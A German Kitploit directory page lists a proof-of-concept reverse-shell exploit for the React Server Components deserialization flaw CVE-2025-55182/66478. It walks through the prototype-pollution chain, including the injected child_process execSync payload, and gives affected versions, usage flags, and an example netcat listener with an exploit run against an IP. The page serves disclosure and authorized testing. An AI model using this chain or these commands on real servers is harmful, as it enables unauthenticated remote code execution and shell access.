Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-66478-PoC-Reverse-Shell — Proof-of-Concept-Exploit für CVE-2025-55182/66478, eine Deserialisierungs-RCE in React Server Components, die über eine manipulierte Multipart-Anfrage eine Reverse Shell ausliefert. | Kitploit
Tools/GitHubGitHub/jotaespig/cve-2025-66478-poc-reverse-shell
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubjotaespig/cve-2025-66478-poc-reverse-shell

CVE-2025-66478-PoC-Reverse-Shell

Proof-of-Concept-Exploit für CVE-2025-55182/66478, eine Deserialisierungs-RCE in React Server Components, die über eine manipulierte Multipart-Anfrage eine Reverse Shell ausliefert.

Repository anzeigen
1vor 9h 5mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-66478 / CVE-2025-55182 („React2Shell“) — RSC Server Actions Deserialisierungs-RCE-PoC

Proof-of-Concept-Exploit für CVE-2025-55182 — öffentlich auch als „React2Shell“ bekannt — eine serverseitige Prototype-Pollution-Schwachstelle in der Deserialisierung von Server Actions in React Server Components (react-server-dom-webpack / -parcel / -turbopack), die Next.js unter der ID CVE-2025-66478 verfolgte (von der NVD als Duplikat abgelehnt, aber dennoch die häufig verwendete Kennung, wenn über die Auswirkungen des Bugs speziell auf Next.js diskutiert wird).

Eine einziger manipulierte Multipart-HTTP-Anfrage pollutes Object.prototype und wandert die Prototyp-Kette entlang, um den Function-Konstruktor zu erreichen, wodurch ein nicht authentifizierter Angreifer beliebigen Node.js-Code im Serverprozess ausführen kann — CVSS 10/10.

Details zur Schwachstelle

Der RSC-Action-Reply-Deserialisierer () löst vom Client gesendete Objektpfade auf (z. B. ), ohne zu validieren, dass der Zielschlüssel kein reservierter/gefährlicher wie ist. Das Setzen von auf ein einfaches Objekt pollutes selbst, sodass jedes danach erstellte Objekt die vom Angreifer kontrollierte Eigenschaft erbt.

Grundursache.
requireModule
"$1:__proto__:then"
__proto__
__proto__
Object.prototype

Exploit-Kette.

  1. then → "$1:__proto__:then" — in die Prototyp-Kette greifen.
  2. _response._formData.get → "$1:constructor:constructor" — von der polluten Prototyp-Kette zum Function-Konstruktor wandern.
  3. _response._prefix — vom Angreifer kontrollierter String, der in Code eingefügt wird, der ausgeführt wird, wenn der Server versucht, das fabrizierte „Thenable“ (ein gefälschtes Promise-ähnliches Objekt) aufzulösen. Dieses PoC setzt ihn auf process.mainModule.require('child_process').execSync('<cmd>').
  4. Das Payload wird als zwei Multipart-Felder (0, 1) in einem POST an die App-Root mit einem Next-Action-Header übermittelt, was die Anfrage direkt in den verwundbaren Server-Actions-Handler leitet.

Betroffene Versionen (laut Datadog-Bericht):

BibliothekVerwundbarGepatcht
react-server-dom-parcel19.0 – 19.2.019.0.1, 19.1.2, 19.2.1
react-server-dom-webpack19.0 – 19.2.019.0.1, 19.1.2, 19.2.1
react-server-dom-turbopack19.0 – 19.2.019.0.1, 19.1.2, 19.2.1

Next.js ist auf 15.x, 16.x und 14.3.0-canary.77+ betroffen, wenn der App Router verwendet wird. Gepatcht in 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 und 16.0.7.

Haftungsausschluss

Nur für autorisierte Sicherheitstests und Bildungszwecke (z. B. CTF/HTB- Labore, eigene Infrastruktur oder Engagements mit schriftlicher Genehmigung). Führen Sie dies nicht gegen Systeme aus, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Voraussetzungen

  • curl
  • bash
  • Ein Listener auf der Angreifer-Maschine (z. B. nc -lvnp <port>), sofern Sie keinen eigenen Befehl über -c angeben
  • Das Ziel muss busybox nc ausführen (oder passen Sie -c an das jeweilige Shell-Dienstprogramm an, das auf dem Ziel verfügbar ist), damit der Standard-Reverse-Shell-Befehl funktioniert

Verwendung

root@kitploit:~
chmod +x exploit.sh
./exploit.sh -t <ziel> -L <lport> [optionen]
FlagErforderlichBeschreibung
-t, --targetjaZiel-Host/IP, auf dem die verwundbare Next.js-App läuft
-L, --lportja*Lokaler Port, an den Ihr Listener gebunden ist
-p, --portneinZiel-Port (Standard: 3000)
-l, --lhostneinIhre IP für den Callback (Standard: automatisch erkannt)
-i, --ifaceneinSchnittstelle zur automatischen Erkennung von --lhost
-c, --commandneinBenutzerdefinierter Befehl, der auf dem Ziel ausgeführt wird (überschreibt die Standard-Reverse-Shell)
--timeoutneincurl-Request-Timeout in Sekunden (Standard: 3)
-v, --verboseneinRequest-/Response-Details ausgeben
-h, --helpneinHilfe anzeigen

* nicht erforderlich, wenn stattdessen -c/--command angegeben wird.

Beispiel

root@kitploit:~
# 1) Listener starten
rlwrap nc -lvnp 9090

# 2) Exploit auslösen
./exploit.sh -t 10.129.245.214 -L 9090

Referenzen

  • CVE-2025-55182 „React2Shell“: Remote Code Execution in React Server Components — Datadog Security Labs
Tool herunterladen